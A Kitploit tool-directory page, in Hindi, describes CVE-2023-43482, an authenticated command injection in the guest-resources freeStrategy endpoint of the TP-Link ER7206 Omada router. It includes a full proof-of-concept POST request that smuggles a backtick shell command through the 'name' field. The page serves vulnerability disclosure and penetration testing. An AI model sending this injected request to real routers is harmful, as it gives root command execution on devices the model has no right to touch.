Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43482 — TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy कमांड इंजेक्शन भेद्यता | Kitploit
उपकरण/GitHubGitHub/mr-xn/cve-2023-43482
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubmr-xn/cve-2023-43482

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy कमांड इंजेक्शन भेद्यता

रिपॉजिटरी देखें
5212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy कमांड इंजेक्शन भेद्यता

सारांश

Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591 में गेस्ट संसाधन कार्यक्षमता में एक कमांड निष्पादन भेद्यता मौजूद है। एक विशेष रूप से तैयार HTTP अनुरोध मनमाने कमांड निष्पादन की ओर ले जा सकता है। एक हमलावर इस भेद्यता को ट्रिगर करने के लिए एक प्रमाणित HTTP अनुरोध कर सकता है।

पुष्टि की गई संवेदनशील संस्करण

नीचे दिए गए संस्करणों का परीक्षण किया गया था या Talos द्वारा संवेदनशील पाए गए थे या विक्रेता द्वारा संवेदनशील पुष्टि की गई थी।

Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591

उत्पाद URL

ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/

विवरण

ER7206 Omada Gigabit VPN Router एक उच्च-प्रदर्शन नेटवर्किंग समाधान है जो गीगाबिट कनेक्टिविटी, अत्यधिक सुरक्षित VPN और केंद्रीकृत क्लाउड प्रबंधन और जीरो-टच प्रोविज़निंग के लिए Omada SDN के साथ एकीकरण का समर्थन करता है।

ER7206 Omada Gigabit VPN Router राउटर या राउटर से जुड़े उपकरणों को प्रबंधित करने के लिए विभिन्न सेवाएं चलाता है। ऐसी ही एक सेवा uhttpd है जो पोर्ट 80/443 पर चलती है। यह उपयोगकर्ताओं को राउटर को कॉन्फ़िगर और प्रबंधित करने के लिए एक वेब इंटरफ़ेस प्रदान करती है। डिफ़ॉल्ट रूप से, सेवा रूट उपयोगकर्ता के रूप में चलती है। एक हमलावर इस सेवा का शोषण करके डिवाइस तक रूट एक्सेस प्राप्त कर सकता है।

डिवाइस में गेस्ट संसाधन जोड़ते समय uhttpd सेवा में एक कमांड इंजेक्शन भेद्यता मौजूद है। वेब इंटरफ़ेस में, गेस्ट संसाधन पृष्ठ Authentication -> Authentication Settings -> Guest Resources पर जाकर पहुँचा जा सकता है। इसमें गेस्ट संसाधनों को जोड़ने, संपादित करने और हटाने की सुविधाएँ हैं। जब एक गेस्ट संसाधन जोड़ा जाता है, तो यह निम्नलिखित HTTP Post अनुरोध को ट्रिगर करता है:

root@kitploit:~
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470

data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D 
टूल डाउनलोड करें